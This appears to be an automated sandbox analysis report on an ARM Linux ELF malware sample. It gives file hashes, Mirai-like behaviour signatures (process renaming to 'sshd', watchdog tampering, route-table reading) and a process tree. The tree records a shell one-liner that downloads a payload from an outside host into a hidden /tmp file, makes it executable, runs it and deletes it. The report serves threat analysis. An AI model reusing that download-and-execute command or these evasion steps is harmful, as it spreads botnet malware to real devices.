Analysis
-
max time kernel
147s -
max time network
138s -
platform
debian-9_armhf -
resource
debian9-armhf-20240226-en -
resource tags
arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
02/04/2024, 01:18
Behavioral task
behavioral1
Sample
a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
Resource
debian9-armhf-20240226-en
General
-
Target
a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
-
Size
139KB
-
MD5
c161f9d73ca2e53a130680b762579df5
-
SHA1
ff2830f335be7d73692dff80072c46d9a244576b
-
SHA256
a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a
-
SHA512
4b2ccdeb1b2e4235c175f4ef1a4054fd2c3449b03fdaa55c85fa92b2efefd68eb37b7c64222d3a43aefbbcefabf6ba487898b2a6931c67df1e2caf1462040269
-
SSDEEP
3072:Z41HOuaGVV3NfHUOjqyldqCw3jkmhxQwoVZUNu:Ze3aGVVdqyldq1jkmhxQwoVZUNu
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 669 a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 689 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/misc/watchdog File opened for modification /dev/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:669 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:670
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:674
-
-
/bin/chmodchmod 777 .....3⤵PID:687
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:689
-
-
/bin/sh/bin/sh ./.....3⤵PID:689
-
-
/bin/rmrm -rf .....3⤵PID:693
-
-